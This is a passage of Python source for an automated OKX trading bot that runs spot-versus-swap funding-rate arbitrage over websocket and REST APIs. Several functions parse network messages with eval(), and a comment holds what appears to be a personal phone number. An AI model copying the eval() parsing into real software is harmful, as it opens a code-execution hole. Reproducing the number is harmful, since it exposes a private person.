def take_close_long_final_close_order(mode_take_close_long_final_close_order,*args,**kwargs):
swap_instrument_id = mode_take_close_long_final_close_order['swap_instrument_id']
swap_close_price = mode_take_close_long_final_close_order['swap_close_price']
swap_close_size = mode_take_close_long_final_close_order['swap_close_size']
swap_order_type = mode_take_close_long_final_close_order['swap_order_type']
# swap平的仓位不够,要继续平空
if float(swap_close_size) != 0:
B = tradeAPI.place_order(instId=swap_instrument_id, tdMode='cross', side='buy', ordType=swap_order_type, sz=swap_close_size, px=swap_close_price)
else:
B = 'none'
return B
def take_close_short_final_close_order(mode_take_close_short_final_close_order,*args,**kwargs):
swap_instrument_id = mode_take_close_short_final_close_order['swap_instrument_id']
swap_close_price = mode_take_close_short_final_close_order['swap_close_price']
swap_close_size = mode_take_close_short_final_close_order['swap_close_size']
swap_order_type = mode_take_close_short_final_close_order['swap_order_type']
# swap要继续平多
if float(swap_close_size) != 0:
B = tradeAPI.place_order(instId=swap_instrument_id, tdMode='cross', side='sell', ordType=swap_order_type, sz=swap_close_size, px=swap_close_price)
else:
B = 'none'
return B
def take_close_long_final_open_order(mode_take_close_long_final_open_order,*args,**kwargs):
swap_instrument_id = mode_take_close_long_final_open_order['swap_instrument_id']
swap_close_price = mode_take_close_long_final_open_order['swap_close_price']
swap_close_size = mode_take_close_long_final_open_order['swap_close_size']
swap_order_type = mode_take_close_long_final_open_order['swap_order_type']
# swap开空
if float(swap_close_size) != 0:
B = tradeAPI.place_order(instId=swap_instrument_id, tdMode='cross', side='sell', ordType=swap_order_type, sz=swap_close_size, px=swap_close_price)
else:
B = 'none'
return B
def take_close_short_final_open_order(mode_take_close_short_final_open_order,*args,**kwargs):
swap_instrument_id = mode_take_close_short_final_open_order['swap_instrument_id']
swap_close_price = mode_take_close_short_final_open_order['swap_close_price']
swap_close_size = mode_take_close_short_final_open_order['swap_close_size']
swap_order_type = mode_take_close_short_final_open_order['swap_order_type']
# swap开多
if float(swap_close_size) != 0:
B = tradeAPI.place_order(instId=swap_instrument_id, tdMode='cross', side='buy', ordType=swap_order_type, sz=swap_close_size, px=swap_close_price)
else:
B = 'none'
return B
def sendmessage(message):
url = ''
HEADERS = {"Content-Type": "application/json ;charset=utf-8 "}
message = message
String_textMsg = {
'msgtype':'text',
'text':{'content':message},
# 'at':{'atMobiles':{'15201106731'}, 'isAtAll':0 #要@所有人就是1 }
}
String_textMsg = json.dumps(String_textMsg)
res = requests.post(url, data=String_textMsg, headers=HEADERS)
def sendmessage_to_customer(message):
url = ''
HEADERS = {"Content-Type": "application/json ;charset=utf-8 "}
message = message
String_textMsg = {
'msgtype':'text',
'text':{'content':message}}
String_textMsg = json.dumps(String_textMsg)
res = requests.post(url, data=String_textMsg, headers=HEADERS)
def funding_recalculate(swap_instrument_id):
A=publicAPI.get_funding_rate(swap_instrument_id)['data']
time.sleep(0.3)
#print(past_funding_rate)
# day3Afundrate=[]
instId_fu = None
# for i in past_funding_rate:
# day3Afundrate.append(precfloat(i['realizedRate'], 6))
# instId_fu = i['instId']
# Afundrate = np.array(day3Afundrate)
for i in A:
instId_fu = i['instId']
present_funding_rate = float(i['fundingRate'])
predict_funding_rate = float(i['nextFundingRate'])
return instId_fu, present_funding_rate, predict_funding_rate
def make_So_Sc(mode_So_Sc, *args, **kwargs):
maker_commission_spot = mode_So_Sc['maker_commission_spot']
maker_commission_swap = mode_So_Sc['maker_commission_swap']
taker_commission_swap = mode_So_Sc['taker_commission_swap']
taker_commission_spot = mode_So_Sc['taker_commission_spot']
swap_present_price = mode_So_Sc['swap_present_price']
spot_index_price = mode_So_Sc['spot_index_price'] #用现货指数
Cm_swap = maker_commission_spot * swap_present_price
Cm_spot = maker_commission_swap * swap_present_price
Ct_swap = taker_commission_swap * spot_index_price
Ct_spot = taker_commission_spot * spot_index_price
if swap_present_price > spot_index_price: #可以开正仓
So=((swap_present_price-spot_index_price-Cm_swap-Cm_spot)+(swap_present_price-spot_index_price-Cm_swap-Cm_spot)) /2 #So是正数
Sc=((spot_index_price-swap_present_price-Cm_swap-Cm_spot)+(spot_index_price-swap_present_price-Cm_swap-Cm_spot)) /2 #Sc没必要
elif spot_index_price>swap_present_price: #可以开负仓
So=((swap_present_price-spot_index_price-Cm_swap-Cm_spot)+(swap_present_price-spot_index_price-Cm_swap-Cm_spot)) /2 # So没必要
Sc=((spot_index_price-swap_present_price-Cm_swap-Cm_spot)+(spot_index_price-swap_present_price-Cm_swap-Cm_spot)) /2 # Sc是正数
elif swap_present_price == spot_index_price:
So=0
Sc=0
return So, Sc
def open_long_judge(mode_open_long_judge, *args, **kwargs):
Target_Amount = mode_open_long_judge['Target_Amount']
spot_balance = mode_open_long_judge['spot_balance']
swap_position = mode_open_long_judge['swap_position']
swap_size = mode_open_long_judge['swap_size']
spot_size = mode_open_long_judge['spot_size']
contract_val = mode_open_long_judge['contract_value']
# spot_balance>0, swap_position是short且<0
open_long_mode = 'off'
open_long_final_open_mode = 'off'
open_long_final_close_mode = 'off'
if Target_Amount - spot_balance > 0 and abs(Target_Amount - spot_balance) > float(spot_size): # 还大于一个 spot_size,继续建仓
open_long_mode = 'on'
elif Target_Amount - spot_balance > 0 and abs(Target_Amount - spot_balance) < float(spot_size): # spot已经接近Target_Amount,小于一个spot_size,spot不动,看swap
if spot_balance + swap_position * contract_val > float(swap_size) * contract_val: #因为posSide是net,所以持仓本身带著正负
open_long_final_open_mode = 'on' # swap要建仓 开空
elif -1*swap_position * contract_val - spot_balance > float(swap_size) * contract_val:
open_long_final_close_mode = 'on' # swap要平仓 平空
return open_long_mode, open_long_final_open_mode, open_long_final_close_mode
def open_short_judge(mode_open_short_judge, *args, **kwargs):
Target_Amount = mode_open_short_judge['Target_Amount']*-1 #因为是负开仓,所以*-1
spot_balance = mode_open_short_judge['spot_balance']
swap_position = mode_open_short_judge['swap_position']
swap_size = mode_open_short_judge['swap_size']
spot_size = mode_open_short_judge['spot_size']
contract_val=mode_open_short_judge['contract_value']
open_short_mode = 'off'
open_short_final_open_mode = 'off'
open_short_final_close_mode = 'off'
#这边TA是<0,spot_balance<0, swap_position是long且>0
if Target_Amount - spot_balance < 0 and abs(Target_Amount - spot_balance) > float(spot_size): # 还大于一个spot_size,继续建仓
open_short_mode = 'on'
elif Target_Amount - spot_balance < 0 and abs(Target_Amount - spot_balance) < float(spot_size): # spot已经接近Target_Amount,小于一个spot_size,spot不动,看swap
# swap建仓比spot少,swap要建仓 开多
if spot_balance + swap_position * contract_val <0 and abs(spot_balance + swap_position * contract_val) > float(swap_size) * contract_val:
open_short_final_open_mode = 'on'
#swap建仓比spot多,swap要平仓 平多
elif spot_balance + swap_position * contract_val >0 and abs(swap_position * contract_val + spot_balance) > float(swap_size) * contract_val:
open_short_final_close_mode = 'on'
return open_short_mode, open_short_final_open_mode, open_short_final_close_mode
def close_long_judge(mode_close_long_judge, *args, **kwargs):
Target_Amount_Close = mode_close_long_judge['Target_Amount_Close']
spot_balance = mode_close_long_judge['spot_balance']
swap_position = mode_close_long_judge['swap_position']
swap_close_size = mode_close_long_judge['swap_close_size']
spot_close_size = mode_close_long_judge['spot_close_size']
Predict_Funding_Rate = mode_close_long_judge['predict_funding']
Present_Funding_Rate = mode_close_long_judge['present_funding']
So_Sc_mode = mode_close_long_judge['So_Sc_mode']
contract_val= mode_close_long_judge['contract_value']
close_long_mode = 'off'
close_long_final_open_mode = 'off'
close_long_final_close_mode = 'off'
#这里Target_Amount_Close=0,swap是short,<0
if spot_balance - Target_Amount_Close > 0 and abs(spot_balance - Target_Amount_Close) > float(spot_close_size): # spot超过TA,要平仓
# if So_Sc_mode == 'on': #等有看So_Sc_mode再看资金费率的影响
# if Predict_Funding_Rate * Present_Funding_Rate >0:
# close_long_mode = 'on'
# else:
# close_long_mode = 'off'
# elif So_Sc_mode =='off': #此时有可能是持仓差过大或大涨需要仓位调整
close_long_mode = 'on'
elif spot_balance - Target_Amount_Close > 0 and abs(spot_balance - Target_Amount_Close) < float(spot_close_size):
if -1*swap_position * contract_val - spot_balance > float(swap_close_size) * contract_val: # swap多于spot,平空
close_long_final_close_mode = 'on'
elif spot_balance + swap_position * contract_val > float(swap_close_size) * contract_val: # swap少于spot,开空
close_long_final_open_mode = 'on'
return close_long_mode, close_long_final_open_mode, close_long_final_close_mode
def close_short_judge(mode_close_short_judge, *args, **kwargs):
Target_Amount_Close = mode_close_short_judge['Target_Amount_Close']
spot_balance = mode_close_short_judge['spot_balance']
swap_position = mode_close_short_judge['swap_position']
swap_close_size = mode_close_short_judge['swap_close_size']
spot_close_size = mode_close_short_judge['spot_close_size']
Predict_Funding_Rate = mode_close_short_judge['predict_funding']
Present_Funding_Rate = mode_close_short_judge['present_funding']
So_Sc_mode = mode_close_short_judge['So_Sc_mode']
contract_val = mode_close_short_judge['contract_value']
close_short_mode = 'off'
close_short_final_open_mode = 'off'
close_short_final_close_mode = 'off'
#这里spot_balance<0,Target_Amount_close=0
if spot_balance - Target_Amount_Close < 0 and abs(spot_balance - Target_Amount_Close) > float(spot_close_size): # spot超过TA,要平仓
# if So_Sc_mode == 'on': #等有看So_Sc_mode再看资金费率的影响
# if Predict_Funding_Rate * Present_Funding_Rate >0:
# close_short_mode = 'on'
# else:
# close_short_mode = 'off'
# elif So_Sc_mode =='off': #此时有可能是持仓差过大或大涨需要仓位调整
close_short_mode = 'on'
elif spot_balance - Target_Amount_Close < 0 and abs(spot_balance - Target_Amount_Close) < float(spot_close_size):
#swap仓位比spot多
if (swap_position * contract_val + spot_balance )>0 and abs(swap_position * contract_val + spot_balance) > float(swap_close_size) * contract_val: # swap多于spot,平多
close_short_final_close_mode = 'on'
#spot仓位比swap多
elif (spot_balance + swap_position * contract_val)<0 and abs(spot_balance + swap_position * contract_val) > float(swap_close_size) * contract_val: # swap少于spot,开多
close_short_final_open_mode = 'on'
return close_short_mode, close_short_final_open_mode, close_short_final_close_mode
def get_timestamp():
now = datetime.now()
t = now.isoformat("T", "milliseconds")
return t + "Z"
def precfloat(num,digi):
return int(round(float(num)*math.pow(10,digi)))/math.pow(10,digi)
def get_server_time():
url = "https://www.okex.com/api/v5/public/time"
response = requests.get(url)
if response.status_code == 200:
return response.json()['data'][0]['ts']
else:
return ""
def get_local_timestamp():
return int(time.time())
def login_params(timestamp, api_key, passphrase, secret_key):
message = timestamp + 'GET' + '/users/self/verify'
mac = hmac.new(bytes(secret_key, encoding='utf8'), bytes(message, encoding='utf-8'), digestmod='sha256')
d = mac.digest()
sign = base64.b64encode(d)
login_param = {"op": "login", "args": [{"apiKey": api_key,
"passphrase": passphrase,
"timestamp": timestamp,
"sign": sign.decode("utf-8")}]}
login_str = json.dumps(login_param)
return login_str
def partial(res):
data_obj = res['data'][0]
bids = data_obj['bids']
asks = data_obj['asks']
instrument_id = res['arg']['instId']
# print('全量数据bids为:' + str(bids))
# print('档数为:' + str(len(bids)))
# print('全量数据asks为:' + str(asks))
# print('档数为:' + str(len(asks)))
return bids, asks, instrument_id
def update_bids(res, bids_p):
# 获取增量bids数据
bids_u = res['data'][0]['bids']
# print('增量数据bids为:' + str(bids_u))
# print('档数为:' + str(len(bids_u)))
# bids合并
for i in bids_u:
bid_price = i[0]
for j in bids_p:
if bid_price == j[0]:
if i[1] == '0':
bids_p.remove(j)
break
else:
del j[1]
j.insert(1, i[1])
break
else:
if i[1] != "0":
bids_p.append(i)
else:
bids_p.sort(key=lambda price: sort_num(price[0]), reverse=True)
# print('合并后的bids为:' + str(bids_p) + ',档数为:' + str(len(bids_p)))
return bids_p
def update_asks(res, asks_p):
# 获取增量asks数据
asks_u = res['data'][0]['asks']
# print('增量数据asks为:' + str(asks_u))
# print('档数为:' + str(len(asks_u)))
# asks合并
for i in asks_u:
ask_price = i[0]
for j in asks_p:
if ask_price == j[0]:
if i[1] == '0':
asks_p.remove(j)
break
else:
del j[1]
j.insert(1, i[1])
break
else:
if i[1] != "0":
asks_p.append(i)
else:
asks_p.sort(key=lambda price: sort_num(price[0]))
# print('合并后的asks为:' + str(asks_p) + ',档数为:' + str(len(asks_p)))
return asks_p
def sort_num(n):
if n.isdigit():
return int(n)
else:
return float(n)
def check(bids, asks):
# 获取bid档str
bids_l = []
bid_l = []
count_bid = 1
while count_bid <= 25:
if count_bid > len(bids):
break
bids_l.append(bids[count_bid-1])
count_bid += 1
for j in bids_l:
str_bid = ':'.join(j[0 : 2])
bid_l.append(str_bid)
# 获取ask档str
asks_l = []
ask_l = []
count_ask = 1
while count_ask <= 25:
if count_ask > len(asks):
break
asks_l.append(asks[count_ask-1])
count_ask += 1
for k in asks_l:
str_ask = ':'.join(k[0 : 2])
ask_l.append(str_ask)
# 拼接str
num = ''
if len(bid_l) == len(ask_l):
for m in range(len(bid_l)):
num += bid_l[m] + ':' + ask_l[m] + ':'
elif len(bid_l) > len(ask_l):
# bid档比ask档多
for n in range(len(ask_l)):
num += bid_l[n] + ':' + ask_l[n] + ':'
for l in range(len(ask_l), len(bid_l)):
num += bid_l[l] + ':'
elif len(bid_l) < len(ask_l):
# ask档比bid档多
for n in range(len(bid_l)):
num += bid_l[n] + ':' + ask_l[n] + ':'
for l in range(len(bid_l), len(ask_l)):
num += ask_l[l] + ':'
new_num = num[:-1]
int_checksum = zlib.crc32(new_num.encode())
fina = change(int_checksum)
return fina
def change(num_old):
num = pow(2, 31) - 1
if num_old > num:
out = num_old - num * 2 - 2
else:
out = num_old
return out
# subscribe channels un_need login
async def subscribe_without_login(url, channels,MQ,TradingPair):
l = []
while True:
try:
async with websockets.connect(url) as ws:
sub_param = {"op": "subscribe", "args": channels}
sub_str = json.dumps(sub_param)
await ws.send(sub_str)
# print(f"send: {sub_str}")
while True:
try:
res = await asyncio.wait_for(ws.recv(), timeout=25)
except (asyncio.TimeoutError, websockets.exceptions.ConnectionClosed) as e:
try:
await ws.send('ping')
res = await ws.recv()
#print(res)
continue
except Exception as e:
print("连接关闭,正在重连……")
break
# print(get_timestamp() + res)
res = eval(res)
if 'event' in res:
continue
#print('market_res',res)
if res['arg']['channel'] == 'books5':
instr = res["arg"]["instId"].split("-")
TP = instr[0] + "-" + instr[1]
if len(instr) == 2:
if MQ[TP]["DEPTH5_SPOT"].empty() == True:
MQ[TP]["DEPTH5_SPOT"].put(res["data"])
elif MQ[TP]["DEPTH5_SPOT"].empty() == False:
MQ[TP]["DEPTH5_SPOT"].get()
MQ[TP]["DEPTH5_SPOT"].put(res["data"])
elif len(instr) == 3:
if MQ[TP]["DEPTH5_SWAP"].empty() == True:
MQ[TP]["DEPTH5_SWAP"].put(res["data"])
elif MQ[TP]["DEPTH5_SWAP"].empty() == False:
MQ[TP]["DEPTH5_SWAP"].get()
MQ[TP]["DEPTH5_SWAP"].put(res["data"])
elif res['arg']['channel'] == 'index-tickers':
#spot的指标tickers
instr = res["arg"]["instId"].split("-")
TP = instr[0] + "-" + instr[1]
if len(instr) == 2:
if MQ[TP]["INDEX_TICKERS_SPOT"].empty() == True:
MQ[TP]["INDEX_TICKERS_SPOT"].put(res["data"])
elif MQ[TP]["INDEX_TICKERS_SPOT"].empty() == False:
MQ[TP]["INDEX_TICKERS_SPOT"].get()
MQ[TP]["INDEX_TICKERS_SPOT"].put(res["data"])
elif res['arg']['channel'] == 'mark-price':
instr = res["arg"]["instId"].split("-")
TP = instr[0] + "-" + instr[1]
if len(instr) == 3:
if MQ[TP]["MARK_PRICE_SWAP"].empty() == True:
MQ[TP]["MARK_PRICE_SWAP"].put(res["data"])
elif MQ[TP]["MARK_PRICE_SWAP"].empty() == False:
MQ[TP]["MARK_PRICE_SWAP"].get()
MQ[TP]["MARK_PRICE_SWAP"].put(res["data"])
elif res['arg']['channel'] == 'funding-rate': #只有swap才有
instr = res["arg"]["instId"].split("-")
TP = instr[0] + "-" + instr[1]
if MQ[TP]["PREDICT_FUNDING"].empty() == True:
MQ[TP]["PREDICT_FUNDING"].put(res["data"])
elif MQ[TP]["PREDICT_FUNDING"].empty() == False:
MQ[TP]["PREDICT_FUNDING"].get()
MQ[TP]["PREDICT_FUNDING"].put(res["data"])
except Exception as e:
#print("disconneted,connecting MQ……")
# error存成csv
mapping = {}
kk = []
path = '/root/' + Customer_name + '_error_report.csv'
key_list = ['timestamp', 'error']
for key, value in zip(key_list, [datetime.now(), e]):
mapping[key] = value
kk.append(eval(json.dumps(mapping)))
kkk = pd.DataFrame(kk)
# kkk.to_csv(path, mode='a+', header=True, index=False)
continue
# subscribe channels need login
async def subscribe(url, api_key, passphrase, secret_key, channels,AQ, TradingPair):
while True:
try:
async with websockets.connect(url) as ws:
# login
timestamp = str(get_local_timestamp())
login_str = login_params(timestamp, api_key, passphrase, secret_key)
await ws.send(login_str)
#print(f"send: {login_str}")
res = await ws.recv()
# print(res)
# subscribe
sub_param = {"op": "subscribe", "args": channels}
sub_str = json.dumps(sub_param)
await ws.send(sub_str)
#print(f"send: {sub_str}")
while True:
try:
res = await asyncio.wait_for(ws.recv(), timeout=25)
except (asyncio.TimeoutError, websockets.exceptions.ConnectionClosed) as e:
try:
await ws.send('ping')
res = await ws.recv()
#print(res)
continue
except Exception as e:
print("连接关闭,正在重连AQ_login……")
break
#get account's info
res = eval(res)
if 'event' in res:
continue
if res['arg']['channel'] == 'account': #spot的balance查询
res_spot_ccy_list=[]
for i in TradingPair: #从TP中做出做res_spot_ccy_list
TP=i.split('-')[0]
res_spot_ccy_list.append(TP)
stream_spot_list=[] #从res做res_spot_ccy_list
if len(res['data']) != 0:
for i in res['data'][0]['details']:
if i['ccy'] != 'USDT':
stream_spot_list.append(i['ccy'])
#找出tp中跟res中有重合的pair
if len(stream_spot_list)!=0:
for j in res_spot_ccy_list:
if j in stream_spot_list:
for k in res['data'][0]['details']:
if k['ccy']==j:
TP=k['ccy']+'-USDT' #記得要是okex的格式
if AQ[TP]["POSITION_SPOT"].empty() == True:
AQ[TP]["POSITION_SPOT"].put(k)
elif AQ[TP]["POSITION_SPOT"].empty() == False:
AQ[TP]["POSITION_SPOT"].get()
AQ[TP]["POSITION_SPOT"].put(k)
else:
TP=j+'-USDT'
kk = {'availBal': '0', 'availEq': '0', 'cashBal': '0', 'ccy': j, 'crossLiab': '0', 'disEq': '0', 'eq': '0', 'frozenBal': '0',
'interest': '0', 'isoEq': '0', 'isoLiab': '0', 'liab': '0', 'mgnRatio': '0', 'ordFrozen': '0', 'twap': '0', 'uTime': '0', 'upl': '0'}
if AQ[TP]["POSITION_SPOT"].empty() == True:
AQ[TP]["POSITION_SPOT"].put(kk)
elif AQ[TP]["POSITION_SPOT"].empty() == False:
AQ[TP]["POSITION_SPOT"].get()
AQ[TP]["POSITION_SPOT"].put(kk)
#print('res_here',res)
if res['arg']['channel'] == 'positions':
if res['arg']['instType'] == 'SWAP':
res_swap_ccy_list=[]
for i in TradingPair: #从TP中做出做res_spot_ccy_list
res_swap_ccy_list.append(i)
stream_swap_list=[] #从res做res_spot_ccy_list
if len(res['data']) != 0:
for i in res['data']:
a=i['instId'].split('-SWAP')[0]
stream_swap_list.append(a)
if len(res_swap_ccy_list) !=0: #出现了一开始建仓ws只送[]的情况,所以改成了 res_swap_ccy_list
for j in res_swap_ccy_list:
if j in stream_swap_list:
for k in res['data']:
if k['instId']==j+'-SWAP':
TP=j
if AQ[TP]["POSITION_SWAP"].empty() == True:
AQ[TP]["POSITION_SWAP"].put(k)
elif AQ[TP]["POSITION_SWAP"].empty() == False:
AQ[TP]["POSITION_SWAP"].get()
AQ[TP]["POSITION_SWAP"].put(k)
else:
TP=j
kk = {'pos': '0', 'availPos': '0', 'cashBal': '0', 'instId': j + '-SWAP','instType': 'SWAP'}
if AQ[TP]["POSITION_SWAP"].empty() == True:
AQ[TP]["POSITION_SWAP"].put(kk)
elif AQ[TP]["POSITION_SWAP"].empty() == False:
AQ[TP]["POSITION_SWAP"].get()
AQ[TP]["POSITION_SWAP"].put(kk)
if res['arg']['instType'] == 'MARGIN': #跨币种不用到这个,全部都会放在spot_balance
# print('margin_res',res)
res_margin_instId_list=[]
for i in TradingPair: #从TP中做出做res_margin_instId_list
TP=i.split('-')[0]
res_margin_instId_list.append(TP)
stream_margin_list=[] #从res做res_margin_instId_list
if len(res['data']) != 0:
for i in res['data'][0]['details']:
if i['ccy'] != 'USDT':
stream_margin_list.append(i['ccy'])
#找出tp中跟res中有重合的pair
if len(stream_margin_list) !=0:
for j in res_margin_instId_list:
if j in stream_margin_list:
for k in res['data'][0]['details']:
if k['ccy']==j:
TP=k['ccy']+'-USDT' #記得要是okex的格式
if AQ[TP]["POSITION_MARGIN"].empty() == True:
AQ[TP]["POSITION_MARGIN"].put(k)
elif AQ[TP]["POSITION_MARGIN"].empty() == False:
AQ[TP]["POSITION_MARGIN"].get()
AQ[TP]["POSITION_MARGIN"].put(k)
else:
TP=j+'-USDT'
kk = {'availBal': '0', 'availEq': '0', 'cashBal': '0', 'ccy': j, 'crossLiab': '0', 'disEq': '0', 'eq': '0', 'frozenBal': '0',
'interest': '0', 'isoEq': '0', 'isoLiab': '0', 'liab': '0', 'mgnRatio': '0', 'ordFrozen': '0', 'twap': '0', 'uTime': '0', 'upl': '0'}
if AQ[TP]["POSITION_MARGIN"].empty() == True:
AQ[TP]["POSITION_MARGIN"].put(kk)
elif AQ[TP]["POSITION_MARGIN"].empty() == False:
AQ[TP]["POSITION_MARGIN"].get()
AQ[TP]["POSITION_MARGIN"].put(kk)
if res['arg']['channel'] == 'orders':
#存spot的未完成订单
#print('orders_res', res)
for j in TradingPair:
if len(res['data']) !=0:
for k in res['data']:
instr_fu = k['instId'].split('-')
if res['data'][0]['instType'] == 'SPOT': #spot
if instr_fu[0] + "-" + instr_fu[1] == j:
TP = instr_fu[0] + "-" + instr_fu[1]
# if k['state'] != 'canceled' or k['state'] != 'filled':
if AQ[TP]["ORDERS_SPOT"].empty() == True:
AQ[TP]["ORDERS_SPOT"].put(k)
elif AQ[TP]["ORDERS_SPOT"].empty() == False:
AQ[TP]["ORDERS_SPOT"].get()
AQ[TP]["ORDERS_SPOT"].put(k)
if res['data'][0]['instType'] == 'SWAP': # swap
if instr_fu[0] + "-" + instr_fu[1] == j:
TP = instr_fu[0] + "-" + instr_fu[1]
if AQ[TP]["ORDERS_SWAP"].empty() == True:
AQ[TP]["ORDERS_SWAP"].put(k)
elif AQ[TP]["ORDERS_SWAP"].empty() == False:
AQ[TP]["ORDERS_SWAP"].get()
AQ[TP]["ORDERS_SWAP"].put(k)
except Exception as e:
print(e)
print("disconnected,connecting AQ……")
# error存成csv
mapping = {}
kk = []
path = '/root/' + Customer_name + '_error_report.csv'
key_list = ['timestamp', 'error']
for key, value in zip(key_list, [datetime.now(), e]):
mapping[key] = value
kk.append(eval(json.dumps(mapping)))
kkk = pd.DataFrame(kk)
# kkk.to_csv(path, mode='a+', header=True, index=False)
continue
# trade
async def trade(url, api_key, passphrase, secret_key, MQ,AQ,TradingPair,param_set_list):
while True:
try:
# print('started')
async with websockets.connect(url) as ws:
# login
timestamp = str(get_local_timestamp())
login_str = login_params(timestamp, api_key, passphrase, secret_key)
await ws.send(login_str)
#print(f"send: {login_str}")
res = await ws.recv()
#print('res_trade',res)
# 全部撤掉遗留单,這裡有restAPI,先試用
beginning_pending_order_result = tradeAPI.get_order_list()
order_id_list = []
if beginning_pending_order_result['data'] != 0:
for i in beginning_pending_order_result['data']:
uncomplete_orderId = i['ordId']
uncomplete_order_instId = i['instId']
key_list = []
value_list = []
key_list = ["instId", "ordId"]
value_list = [uncomplete_order_instId, uncomplete_orderId]
dictionary_uncomplete_order = dict(zip(key_list, value_list))
order_id_list.append(dictionary_uncomplete_order)
if len(order_id_list) != 0:
revoke_result = tradeAPI.cancel_multiple_orders(order_id_list)
time.sleep(0.1)
maker_commission_spot = param_set_list['maker_commission_spot']
taker_commission_spot = param_set_list['taker_commission_spot']
maker_commission_swap = param_set_list['maker_commission_swap']
taker_commission_swap = param_set_list['taker_commission_swap']
tolerate_limit = param_set_list['tolerate_limit']
order_limit = param_set_list['order_limit'] #每次开仓出手是几美元
close_short_index = param_set_list['close_short_index'] #平仓是开仓的几倍
Nowtime = datetime.now()
print(Nowtime)
record_minute = Nowtime.minute
record_hour = Nowtime.hour
# 先找instruments参数
Necessary_info = {}
Operation_info = {}
print('TradingPair',TradingPair)
for i in TradingPair:
Necessary_info[i] = {}
Operation_info[i] = {}
for i in TradingPair:
Necessary_info[i]['swap_instrument_id']=i+'-SWAP'
Necessary_info[i]['spot_instrument_id']=i
Necessary_info[i]['Total_money'] = TradingPair[i]
swap_info = publicAPI.get_instruments('SWAP')['data']
time.sleep(0.1)
# print(swap_info)
for j in swap_info:
if j['instId'] == i + '-SWAP': # need to notice here's insId (SWAP)
Necessary_info[i]['swap_tick_size'] = float(j["tickSz"])
Necessary_info[i]['swap_tick_digit'] = np.log10(1 / float(j["tickSz"]))
Necessary_info[i]['contract_val'] = float(j['ctVal'])
Necessary_info[i]['swap_min_size'] = float(j['minSz'])
spot_info = publicAPI.get_instruments('SPOT')['data']
time.sleep(0.1)
for j in spot_info:
if j['instId'] == i : # need to notice here's insId (SWAP)
Necessary_info[i]['spot_tick_size'] = float(j["tickSz"])
Necessary_info[i]['spot_tick_digit'] = np.log10(1 / float(j["tickSz"]))
Necessary_info[i]['spot_min_size'] = float(j['minSz'])
# Funding_Rate
instId_fu, Necessary_info[i]['Present_Funding_Rate'],Necessary_info[i]['Predict_Funding_Rate'] = funding_recalculate(i + '-SWAP')
Operation_info[i]['spot_bids_price5']=[]
Operation_info[i]['spot_asks_price5']=[]
# try:
# spot_depth5 = MQ[i]["DEPTH5_SPOT"].get(timeout=1)
# print('我spot_depth5用ws___2')
# except:
# spot_depth5 = marketAPI.get_orderbook(i , '5')['data']
# print('我spot_depth5用restapi___2')
# time.sleep(0.1)
try:
Operation_info[i]['spot_depth5'] = MarketQ[i]["DEPTH5_SPOT"].get(timeout=1)
except:
try:
Operation_info[i]['spot_depth5'] = Operation_info[i]['spot_depth5']
except:
Operation_info[i]['spot_depth5'] = marketAPI.get_orderbook(i , '5')['data']
print('我spot_depth5用restapi__2')
time.sleep(0.1)
for j in range(5):
Operation_info[i]['spot_bids_price5'].append(float(Operation_info[i]['spot_depth5'][0]['bids'][j][0]))
Operation_info[i]['spot_asks_price5'].append(float(Operation_info[i]['spot_depth5'][0]['asks'][j][0]))
Operation_info[i]['swap_bids_price5'] = []
Operation_info[i]['swap_asks_price5'] = []
#测试
# swap_depth5 = MQ[h]["DEPTH5_SWAP"].get(timeout=1)
try:
Operation_info[i]['swap_depth5'] = MQ[i]["DEPTH5_SWAP"].get(timeout=1)
except:
try:
Operation_info[i]['swap_depth5']= Operation_info[i]['swap_depth5']
except:
Operation_info[i]['swap_depth5'] = marketAPI.get_orderbook(i + '-SWAP', '5')['data']
time.sleep(0.1)
print('我swap_depth5用restapi__2')
for j in range(5):
Operation_info[i]['swap_bids_price5'].append(float(Operation_info[i]['swap_depth5'][0]['bids'][j][0]))
Operation_info[i]['swap_asks_price5'].append(float(Operation_info[i]['swap_depth5'][0]['asks'][j][0]))
# Operation_info[i]['spot_swap_update_mode'] = 'off'
Operation_info[i]['swap_pending_list_left'] = 'off'
Operation_info[i]['spot_pending_list_left'] = 'off'
Operation_info[i]['swap_pending_order_result']=[]
Operation_info[i]['spot_pending_order_result']=[]
#计算每小时的buy/sell成交数量
Operation_info[i]['spot_buy_trading_orders']=0
Operation_info[i]['spot_sell_trading_orders']=0
Operation_info[i]['swap_buy_trading_orders']=0
Operation_info[i]['swap_sell_trading_orders']=0
#计算每小时的成交净值
Operation_info[i]['spot_buy_trading_net_amount']=0
Operation_info[i]['spot_sell_trading_net_amount']=0
Operation_info[i]['swap_buy_trading_net_amount']=0
Operation_info[i]['swap_sell_trading_net_amount']=0
Operation_info[i]['spot_trading_buy_size']=0
Operation_info[i]['spot_trading_sell_size']=0
Operation_info[i]['swap_trading_buy_size']=0
Operation_info[i]['swap_trading_sell_size']=0
Operation_info[i]['spot_trading_fee']=0
Operation_info[i]['swap_trading_fee']=0
#用来判断持仓歪掉时,是要平仓还是建仓,先设成是open状态
Operation_info[i]['position_direction']='open'
while True:
try:
#time.sleep(0.5)
for h in TradingPair:
#先在这里设spot/swap size
open_long_mode = 'off'
open_short_mode = 'off'
close_long_mode = 'off'
close_short_mode = 'off'
open_long_final_open_mode = 'off'
open_short_final_open_mode = 'off'
open_long_final_close_mode = 'off'
open_short_final_close_mode = 'off'
close_long_final_open_mode = 'off'
close_short_final_open_mode = 'off'
close_long_final_close_mode = 'off'
close_short_final_close_mode = 'off'
So_Sc_mode = 'on'
no_pending_order = 'on' #一开始没有遗留单
mode_take_long_order = {}
mode_take_short_order = {}
Nowtime = datetime.now()
#在资金费率开始前半小时跟后两小时机器人不要动,12600秒内不要动
# Total_seconds=0
# if Nowtime.hour in [7,8,15,16,23,0]:
# if Nowtime.hour in [7,15,23] and Nowtime.minute<30:
# pass
# else:
# if Nowtime.hour in [7,8]:
# T_hour=8-Nowtime.hour
# T_minute=60-Nowtime.minute
# T_second=60-Nowtime.second
# elif Nowtime.hour in [15,16]:
# T_hour=16-Nowtime.hour
# T_minute=60-Nowtime.minute
# T_second=60-Nowtime.second
# elif Nowtime.hour in [23,0]:
# if Nowtime.hour == 23:
# t_hour=-1
# else:
# t_hour= Nowtime.hour
# T_hour=0-t_hour
# T_minute=60-Nowtime.minute
# T_second=60-Nowtime.second
# Total_seconds=T_hour*3600+T_minute*60+T_second
# print(Total_seconds)
# print('trade loop now for sleep')
# time.sleep(Total_seconds)
#每分钟找predict_funding_rate
new_record_minute = Nowtime.minute
if new_record_minute != record_minute:
#print(new_record_minute)
try:
Swap_Funding_Rate = MQ[h]["PREDICT_FUNDING"].get(timeout=0.5)
